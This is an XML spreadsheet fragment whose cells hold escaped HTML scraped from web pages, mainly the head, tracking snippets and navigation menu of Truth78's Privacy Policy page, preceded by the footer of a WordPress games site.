			&lt;i class="tg-icon tg-icon-arrow-up"&gt;&lt;span_x005F_x000D_
						class="screen-reader-text"&gt;Scroll to top&lt;/span&gt;&lt;/i&gt;_x005F_x000D_
		&lt;/a&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="tg-overlay-wrapper"&gt;&lt;/div&gt;_x005F_x000D_
		_x005F_x000D_
	&lt;script type="text/javascript"&gt;
		var c = document.body.className;
		c = c.replace( /everest-forms-no-js/, 'everest-forms-js' );
		document.body.className = c;
	&lt;/script&gt;
	&lt;script type='text/javascript' src='https://www.bowengames.com/wp-content/themes/zakra/assets/js/navigation.min.js?ver=20151215'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.bowengames.com/wp-content/themes/zakra/assets/js/skip-link-focus-fix.min.js?ver=20151215'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.bowengames.com/wp-content/themes/zakra/assets/js/zakra-custom.min.js?ver=5.3.14'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.bowengames.com/wp-includes/js/wp-embed.min.js?ver=5.3.14'&gt;&lt;/script&gt;
_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en"&gt;
    &lt;head &gt;
        &lt;script&gt;
    var BASE_URL = 'https://www.truth78.org/';
    var require = {
        "baseUrl": "https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US"
    };
&lt;/script&gt;
        &lt;meta charset="utf-8"/&gt;
&lt;meta name="title" content="Privacy Policy - Truth78"/&gt;
&lt;meta name="description" content="The personal information provided to Truth78 will not be given to or shared with anyone outside of Truth78, or business partners that Truth78 has established, unless you explicitly allow it, or we believe that it is necessary to comply with the law, protect the safety of any person, or to address fraud, security or technical issues._x005F_x000D_
"/&gt;
&lt;meta name="keywords" content="data, personal information, privacy, trust, information"/&gt;
&lt;meta name="robots" content="INDEX,FOLLOW"/&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"/&gt;
&lt;meta name="format-detection" content="telephone=no"/&gt;
&lt;meta name="facebook-domain-verification" content="low6namuhk63ks6fwsbclmypa85z2k"/&gt;
&lt;title&gt;Privacy Policy - Truth78&lt;/title&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/mage/calendar.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/styles-m.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/slick/slick.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/slick/slick-theme.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/fonts/font-awesome-4.6.3/css/font-awesome.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/main.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/custom.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Amasty_Base/vendor/slick/amslick.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Blackbird_MenuManager/css/menumanager_menu_front.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Lof_All/css/fix_magento2.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Lof_All/lib/fancybox/jquery.fancybox.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Lof_Formbuilder/css/bootstrap-tiny.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Lof_Formbuilder/js/raty/jquery.raty.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Lof_Formbuilder/css/font-awesome.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Lof_Formbuilder/css/styles.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Magefan_Blog/css/blog-m.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Magefan_Blog/css/blog-new.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Magefan_Blog/css/blog-custom.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_BaseWidget/css/animate.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_All/lib/owl.carousel/assets/owl.carousel.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_All/lib/bootstrap/css/bootstrap.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_All/lib/colorbox/colorbox.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_All/lib/fancybox/jquery.fancybox.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_BaseWidget/css/video-js.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_BaseWidget/css/swiper/swiper.min.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_BaseWidget/css/swiper/styles.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_BaseWidget/css/bannercountdown/style.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_BaseWidget/css/styles.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/Ves_PageBuilder/css/styles.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="screen and (min-width: 768px)" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/styles-l.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="print" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/print.css" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="all" href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Lato" /&gt;
&lt;link  rel="stylesheet" type="text/css"  media="screen and (max-width: 768px)" href="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/css/mobile.css" /&gt;
&lt;script  type="text/javascript"  src="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/requirejs/require.js"&gt;&lt;/script&gt;
&lt;script  type="text/javascript"  src="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/mage/requirejs/mixins.js"&gt;&lt;/script&gt;
&lt;script  type="text/javascript"  src="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/requirejs-config.js"&gt;&lt;/script&gt;
 &lt;script  type="text/javascript"  src="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/mage/polyfill.js"&gt;&lt;/script&gt;
&lt;link  rel="icon" type="image/x-icon" href="https://www.truth78.org/media/favicon/stores/1/Truth78_Favicon.png" /&gt;
&lt;link  rel="shortcut icon" type="image/x-icon" href="https://www.truth78.org/media/favicon/stores/1/Truth78_Favicon.png" /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager --&gt;_x005F_x000D_
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':_x005F_x000D_
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],_x005F_x000D_
 j</t>
  </si>
  <si>
    <t xml:space="preserve">Start of HubSpot Embed Code --&gt;_x005F_x000D_
  &lt;script type="text/javascript" id="hs-script-loader" async defer src="//js-na1.hs-scripts.com/20528130.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;!-- End of HubSpot Embed Code --&gt;_x005F_x000D_
_x005F_x000D_
 &lt;meta name="google-site-verification" content="SLQkW1warLGvQ1gXI-I5bt-JQ7DyoNSYZtldbFN-cs4" /&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;meta name="google-site-verification" content="e_M9Ury-AAZDFDflCEcvdPJSqjuHCOdVB3xMh_Ox3C8" /&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Meta Pixel Code --&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
! function(f,b,e,v,n,t,s)_x005F_x000D_
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?_x005F_x000D_
n.callMethod.apply(n,arguments):n.queue.push(arguments)};_x005F_x000D_
</t>
  </si>
  <si>
    <t>if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';_x005F_x000D_
n.queue=[];t=b.createElement(e);t.async=!0;_x005F_x000D_
t.src=v;s=b.getElementsByTagName(e)[0];_x005F_x000D_
s.parentNode.insertBefore(t,s)}(window, document,'script',_x005F_x000D_
'https://connect.facebook.net/en_US/fbevents.js');_x005F_x000D_
fbq('init', '434481715336212');_x005F_x000D_
fbq('track', 'PageView');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;&lt;img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=434481715336212&amp;ev=PageView&amp;noscript=1"/&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End Meta Pixel Code --&gt;        &lt;!-- Google Tag Manager --&gt;
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push(
        {'gtm.start': new Date().getTime(),event:'gtm.js'}
    );var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-PHLP4PS');&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager --&gt;&lt;!-- BEGIN GOOGLE ANALYTICS CODE --&gt;
&lt;script type="text/x-magento-init"&gt;
{
    "*": {
        "Magento_GoogleAnalytics/js/google-analytics": {
            "isCookieRestrictionModeEnabled": 0,
            "currentWebsite": 1,
            "cookieName": "user_allowed_save_cookie",
            "ordersTrackingData": [],
            "pageTrackingData": {"optPageUrl":"","isAnonymizedIpActive":false,"accountId":"UA-41910515-3"}        }
    }
}
&lt;/script&gt;
&lt;!-- END GOOGLE ANALYTICS CODE --&gt;
&lt;!-- BEGIN GOOGLE VERIFICATION TAG --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>END GOOGLE VERIFICATION TAG --&gt;
&lt;!-- BEGIN GTAG GLOBAL TAG --&gt;
&lt;!-- END GTAG GLOBAL TAG --&gt;
    &lt;/head&gt;
    &lt;body data-container="body"
          data-mage-init='{"loaderAjax": {}, "loader": { "icon": "https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/images/loader-2.gif"}}'
        class="cms-privacy-policy cms-page-view page-layout-1column-fullwidth"&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager (noscript) --&gt;
&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PHLP4PS"
                  height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
&lt;!-- End Google Tag Manager (noscript) --&gt;
    &lt;script&gt;
        require.config({
            deps: [
                'jquery',
                'mage/translate',
                'jquery/jquery-storageapi'
            ],
            callback: function ($) {
                'use strict';
                var dependencies = [],
                    versionObj;
                $.initNamespaceStorage('mage-translation-storage');
                $.initNamespaceStorage('mage-translation-file-version');
                versionObj = $.localStorage.get('mage-translation-file-version');
                if (versionObj.version !== '20c5f671f3ffeb2a18620c6c742ac03ab6f68ca8') {
                    dependencies.push(
                        'text!js-translation.json'
                    );
                }
                require.config({
                    deps: dependencies,
                    callback: function (string) {
                        if (typeof string === 'string') {
                            $.mage.translate.add(JSON.parse(string));
                            $.localStorage.set('mage-translation-storage', string);
                            $.localStorage.set(
                                'mage-translation-file-version',
                                {
                                    version: '20c5f671f3ffeb2a18620c6c742ac03ab6f68ca8'
                                }
                            );
                        } else {
                            $.mage.translate.add($.localStorage.get('mage-translation-storage'));
                        }
                    }
                });
            }
        });
    &lt;/script&gt;
&lt;script type="text/x-magento-init"&gt;
    {
        "*": {
            "mage/cookies": {
                "expires": null,
                "path": "\u002F",
                "domain": ".truth78.org",
                "secure": false,
                "lifetime": "3600"
            }
        }
    }
&lt;/script&gt;
    &lt;noscript&gt;
        &lt;div class="message global noscript"&gt;
            &lt;div class="content"&gt;
                &lt;p&gt;
                    &lt;strong&gt;JavaScript seems to be disabled in your browser.&lt;/strong&gt;
                    &lt;span&gt;For the best experience on our site, be sure to turn on Javascript in your browser.&lt;/span&gt;
                &lt;/p&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/noscript&gt;
&lt;script&gt;
    require.config({
        map: {
            '*': {
                wysiwygAdapter: 'mage/adminhtml/wysiwyg/tiny_mce/tinymce4Adapter'
            }
        }
    });
&lt;/script&gt;
&lt;!-- BEGIN GTAG CART SCRIPT --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>END GTAG CART SCRIPT --&gt;
&lt;div class="page-wrapper"&gt;&lt;header class="page-header"&gt;&lt;div class="panel wrapper"&gt;&lt;div class="top-bar"&gt;&lt;div class="wrap"&gt;&lt;ul class="header links"&gt;&lt;li&gt;&lt;a href="https://www.truth78.org/customer/account/" &gt; My Account&lt;/a&gt;&lt;/li&gt;&lt;li class="authorization-link" data-label="or"&gt;
    &lt;a href="https://www.truth78.org/customer/account/login/"&gt;
        Sign In    &lt;/a&gt;
&lt;/li&gt;
&lt;li class="item link compare" data-bind="scope: 'compareProducts'" data-role="compare-products-link"&gt;
    &lt;a class="action compare no-display" title="Compare&amp;#x20;Products"
       data-bind="attr: {'href': compareProducts().listUrl}, css: {'no-display': !compareProducts().count}"
    &gt;
        Compare Products        &lt;span class="counter qty" data-bind="text: compareProducts().countCaption"&gt;&lt;/span&gt;
    &lt;/a&gt;
&lt;/li&gt;
&lt;script type="text/x-magento-init"&gt;
{"[data-role=compare-products-link]": {"Magento_Ui/js/core/app": {"components":{"compareProducts":{"component":"Magento_Catalog\/js\/view\/compare-products"}}}}}
&lt;/script&gt;
            &lt;li&gt;&lt;a href="https://www.truth78.org/contact-us/" &gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li data-block="minicart" class="cart"&gt;
    &lt;a class="action showcart" href="https://www.truth78.org/checkout/cart/"
       data-bind="scope: 'minicart_content'"&gt;
        &lt;span class="counter qty empty"
              data-bind="css: { empty: !!</t>
  </si>
  <si>
    <t>getCartParam('summary_count') == false }, blockLoader: isLoading"&gt;
            &lt;span class="counter-number"&gt;&lt;!-- ko text: getCartParam('summary_count') --&gt;&lt;!-- /ko</t>
  </si>
  <si>
    <t xml:space="preserve">--&gt;&lt;/span&gt;
            &lt;span class="counter-label"&gt;
            Items            &lt;/span&gt;
        &lt;/span&gt;
        &lt;img src="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/images/icon-cart.png" alt="My Cart" title="My Cart"&gt;
    &lt;/a&gt;
            &lt;div class="block block-minicart empty"
             data-role="dropdownDialog"
             data-mage-init='{"dropdownDialog":{
                "appendTo":"[data-block=minicart]",
                "triggerTarget":".showcart",
                "timeout": "2000",
                "closeOnMouseLeave": false,
                "closeOnEscape": true,
                "triggerClass":"active",
                "parentClass":"active",
                "buttons":[]}}'
             style="display: none;"&gt;
            &lt;div id="minicart-content-wrapper" data-bind="scope: 'minicart_content'"&gt;
                &lt;!-- ko template: getTemplate() --&gt;&lt;!-- /ko --&gt;
            &lt;/div&gt;
                    &lt;/div&gt;
        &lt;script&gt;
        window.checkout = {"shoppingCartUrl":"https:\/\/www.truth78.org\/checkout\/cart\/","checkoutUrl":"https:\/\/www.truth78.org\/checkout\/","updateItemQtyUrl":"https:\/\/www.truth78.org\/checkout\/sidebar\/updateItemQty\/","removeItemUrl":"https:\/\/www.truth78.org\/checkout\/sidebar\/removeItem\/","imageTemplate":"Magento_Catalog\/product\/image_with_borders","baseUrl":"https:\/\/www.truth78.org\/","minicartMaxItemsVisible":5,"websiteId":"1","maxItemsToDisplay":25,"storeId":"1","customerLoginUrl":"https:\/\/www.truth78.org\/customer\/account\/login\/","isRedirectRequired":false,"autocomplete":"off","captcha":{"user_login":{"isCaseSensitive":false,"imageHeight":50,"imageSrc":"","refreshUrl":"https:\/\/www.truth78.org\/captcha\/refresh\/","isRequired":false,"timestamp":1681312311}}};
        require(["jquery", "prototype"], function($) {
            let minicart = $('[data-block="minicart"]');
            minicart.on('contentLoading', function () {
                minicart.on('contentUpdated', function () {
                    minicart.find('[data-role="dropdownDialog"]').dropdownDialog("open");
                    $('.control.qty input').val('').trigger('change');
                });
            });
        });
    &lt;/script&gt;
    &lt;script type="text/x-magento-init"&gt;
    {
        "[data-block='minicart']": {
            "Magento_Ui/js/core/app": {"components":{"minicart_content":{"children":{"subtotal.container":{"children":{"subtotal":{"children":{"subtotal.totals":{"config":{"display_cart_subtotal_incl_tax":0,"display_cart_subtotal_excl_tax":1,"template":"Magento_Tax\/checkout\/minicart\/subtotal\/totals"},"children":{"subtotal.totals.msrp":{"component":"Magento_Msrp\/js\/view\/checkout\/minicart\/subtotal\/totals","config":{"displayArea":"minicart-subtotal-hidden","template":"Magento_Msrp\/checkout\/minicart\/subtotal\/totals"}}},"component":"Magento_Tax\/js\/view\/checkout\/minicart\/subtotal\/totals"}},"component":"uiComponent","config":{"template":"Magento_Checkout\/minicart\/subtotal"}}},"component":"uiComponent","config":{"displayArea":"subtotalContainer"}},"item.renderer":{"component":"uiComponent","config":{"displayArea":"defaultRenderer","template":"Aitoc_PreOrders\/minicart\/item\/default"},"children":{"item.image":{"component":"Magento_Catalog\/js\/view\/image","config":{"template":"Magento_Catalog\/product\/image","displayArea":"itemImage"}},"checkout.cart.item.price.sidebar":{"component":"uiComponent","config":{"template":"Magento_Checkout\/minicart\/item\/price","displayArea":"priceSidebar"}}}},"extra_info":{"component":"uiComponent","config":{"displayArea":"extraInfo"}},"promotion":{"component":"uiComponent","config":{"displayArea":"promotion"}}},"config":{"itemRenderer":{"default":"defaultRenderer","simple":"defaultRenderer","virtual":"defaultRenderer"},"template":"Magento_Checkout\/minicart\/content"},"component":"Magento_Checkout\/js\/view\/minicart"}},"types":[]}        },
        "*": {
            "Magento_Ui/js/block-loader": "https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/images/loader-1.gif"
        }
    }
    &lt;/script&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;a class="action skip contentarea" href="#contentarea"&gt;&lt;span&gt;Skip to Content&lt;/span&gt;&lt;/a&gt;
&lt;div class="switcher store switcher-store" id="switcher-store"&gt;
&lt;strong class="label switcher-label"&gt;&lt;span&gt;Select Store&lt;/span&gt;&lt;/strong&gt;
&lt;div class="actions dropdown options switcher-options"&gt;
                        &lt;div class="action toggle switcher-trigger"
                 role="button"
                 tabindex="0"
                 data-mage-init='{"dropdown":{}}'
                 data-toggle="dropdown"
                 data-trigger-keypress-button="true"
                 id="switcher-store-trigger"&gt;
                &lt;strong&gt;
                                            &lt;span class="default"&gt;
                        English                    &lt;/span&gt;
                                    &lt;/strong&gt;
            &lt;/div&gt;
                            &lt;ul class="dropdown switcher-dropdown" data-target="dropdown"&gt;
                                                        &lt;li class="switcher-option"&gt;
                    &lt;a class="spanish"
                       href='https://www.truth78.org/es/'
                    &gt;
                        Spanish                    &lt;/a&gt;
                &lt;/li&gt;
                                        &lt;li class="switcher-option"&gt;
                &lt;a class="languages" href="https://www.truth78.org/languages/"&gt;
                    Other Languages                &lt;/a&gt;
            &lt;/li&gt;
            &lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="site-header wrap"&gt;
&lt;a href="#" class="nav-opener"&gt;&lt;span&gt;Menu&lt;/span&gt;&lt;/a&gt;
    &lt;a class="logo" href="https://www.truth78.org/" title="Truth78"&gt;
        &lt;img src="https://www.truth78.org/media/logo/stores/1/Transparent_Truth78_Logo.png"
             alt="Truth78"
             width="189"             height="64"        /&gt;
    &lt;/a&gt;
&lt;a class="action showcart mobileOnly cartHeader" href="https://www.truth78.org/checkout/cart/"
       data-bind="scope: 'minicart_content'"&gt;
        &lt;span class="counter qty empty"
              data-bind="css: { empty: !! getCartParam('summary_count') == false }, blockLoader: isLoading"&gt;
        &lt;/span&gt;
        &lt;img src="https://www.truth78.org/static/version1681130435/frontend/Truth78/theme-truth78/en_US/images/icon-cart.png" alt="My Cart" title="My Cart"&gt;
&lt;/a&gt;
&lt;nav class="nav-bar"&gt;
	&lt;div class="js-drop-slide-holder"&gt;
	    &lt;ul class="nav js-drop-down"&gt;
			    &lt;li class="level0  first level-top"&gt;
        &lt;a href=https://www.truth78.org/vision-overview class="level0  first level-top" target=_self role="menuitem"&gt;
            &lt;span&gt;Vision&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
				&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
				&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/vision-overview							class="level0  first level-top"
							target=_self role="menuitem"&gt;
							Vision						&lt;/a&gt;
					&lt;/span&gt;
					</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul class="nav-children"&gt;
						    &lt;li class="level1  first"&gt;
        &lt;a href=https://www.truth78.org/vision-overview class="level1  first" target=_self role="menuitem"&gt;
            &lt;span&gt;Vision Overview&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level1 "&gt;
        &lt;a href=https://www.truth78.org/foundations-for-ministry class="level1 " target=_self role="menuitem"&gt;
            &lt;span&gt;Foundations for Ministry&lt;/span&gt;
        &lt;/a&gt;
             &lt;/li&gt;
    &lt;li class="level1  </t>
  </si>
  <si>
    <t>last"&gt;
        &lt;a href=https://www.truth78.org/Zealous class="level1  last" target=_self role="menuitem"&gt;
            &lt;span&gt;Zeal for Discipleship&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
					&lt;/ul&gt;
				&lt;/div&gt;
			&lt;/div&gt;
            &lt;/li&gt;
    &lt;li class="level0 mega-nav js-not-clickable level-top"&gt;
        &lt;a href=https://www.truth78.org/ class="level0 mega-nav js-not-clickable level-top"
			target=_self role="menuitem"&gt;
            &lt;span&gt;Church &amp;amp; Family&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
						&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
						&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/							class="level0 mega-nav js-not-clickable level-top"
							target=_self role="menuitem"&gt;
							Church &amp;amp; Family						&lt;/a&gt;
					&lt;/span&gt;
			            &lt;ul&gt;
			                    &lt;li class="level1  first"&gt;
        &lt;a href=https://www.truth78.org/church-overview class="level1  first" target=_self role="menuitem"&gt;
            &lt;span&gt;Church&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
				&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
				&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/church-overview							class="level1  first"
							target=_self role="menuitem"&gt;
							Church						&lt;/a&gt;
					&lt;/span&gt;
					 &lt;ul class="nav-children"&gt;
						    &lt;li class="level2   first"&gt;
        &lt;a href=https://www.truth78.org/church-overview class="level2  first" target=_self role="menuitem"&gt;
            &lt;span&gt;Church Overview&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/curriculum-introduction class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;</t>
  </si>
  <si>
    <t>Curriculum Introduction&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/curriculum-samples class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Curriculum Samples&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/curricula-distinctions class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Curricula Distinctions&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/electronic-licenses class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Electronic Licenses&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/partnering-with-parents class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt; Partnering with Parents&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
					&lt;/ul&gt;
				&lt;/div&gt;
			&lt;/div&gt;
            &lt;/li&gt;
    &lt;li class="level1</t>
  </si>
  <si>
    <t>"&gt;
        &lt;a href=https://www.truth78.org/family-overview class="level1 " target=_self role="menuitem"&gt;
            &lt;span&gt;Family&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
				&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
				&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/family-overview							class="level1 "
							target=_self role="menuitem"&gt;
							Family						&lt;/a&gt;
					&lt;/span&gt;
					 &lt;ul class="nav-children"&gt;
						    &lt;li class="level2   first"&gt;
        &lt;a href=https://www.truth78.org/family-overview class="level2  first" target=_self role="menuitem"&gt;
            &lt;span&gt;Family Overview&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/family-devotions class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Family Devotions&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/partnering-with-your-church class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Partnering with Your Church&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/children-in-the-church-services class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Children in the Church Services&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/apps-for-families class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Apps for Families&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2  last"&gt;
        &lt;a href=https://www.truth78.org/home-based-discipleship class="level2  last" target=_self role="menuitem"&gt;
            &lt;span&gt;Home-Based Discipleship&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
					&lt;/ul&gt;
				&lt;/div&gt;
			&lt;/div&gt;
            &lt;/li&gt;
    &lt;li class="level1  last"&gt;
        &lt;a href=https://www.truth78.org/fighter-verses class="level1  last" target=_self role="menuitem"&gt;
            &lt;span&gt;Bible Memory&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
